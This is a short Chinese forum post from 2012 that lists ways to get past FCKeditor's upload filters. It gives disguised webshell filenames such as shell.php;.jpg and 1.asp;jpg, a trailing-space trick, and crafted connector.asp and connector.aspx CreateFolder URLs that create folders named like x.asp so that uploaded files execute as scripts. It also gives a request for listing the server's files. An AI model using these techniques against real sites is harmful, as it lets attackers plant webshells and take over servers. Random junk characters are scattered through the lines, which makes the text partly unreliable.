很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
/ D, y; {+ \3 k( e! c6 [$ k2 g; _' D" [3 p
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
( M$ i$ W8 X4 D/ r0 }: h- s. n
+ G; Q2 g& O5 q0 ]继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
* E, F$ X+ m1 ?6 E$ `
6 O) H+ b$ G3 A0 Z8 F0 B突破建立文件夹:/ k' ?! n. D/ N; ~$ [; R$ s
: d1 l; f0 L* U+ n) z
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp5 n5 U1 S& y# g8 A. _9 C
- K- H Y; A3 f# I0 ^5 m参数:9 [2 @0 e& n% |! m% l; q4 j) h! L
+ c) k+ t) D* H( j' d' m
当前目录名:CurrentFolder=/qing.asp
4 t B7 }, A6 T7 B4 q& I' M4 ^# g% s7 ~% y( [4 d* H1 n
新的目录名:NewFolderName=x.asp% D9 V, u) {9 P; j& X
) j3 }( d1 d6 Z) W n" n9 D其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
7 M; O" y8 j U6 h$ V* I4 ~* l0 A, R% m; O) x7 s5 R
那么 x.asp 就已经建立生成了,此方法百试百灵! `( a$ V; U% s6 u& @; k/ f
* E/ a- [# Z/ D5 c# `
新建文件夹参数 x.asp,基本都能搞定。
* k# |) ^7 s. L& {4 H# S5 Q& q6 S2 M: G' J% Y. `' z; @
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建& U; v# O) j$ x3 l" \% u8 m+ {) U
$ J, t0 w/ ]$ N: ?9 h" K& ?aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp( w) x# O- c: ~+ B9 u9 `, h) z) G
1 Y9 p5 k3 a$ _- A获取文件列表
" y9 ^9 Z2 H' N8 P V. |: K aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
& K( J+ ~! {, j1 V l
. W' D0 }& l' E* R( p5 L5 @ |
发表于 2012-12-31 09:27:09
收藏
支持
反对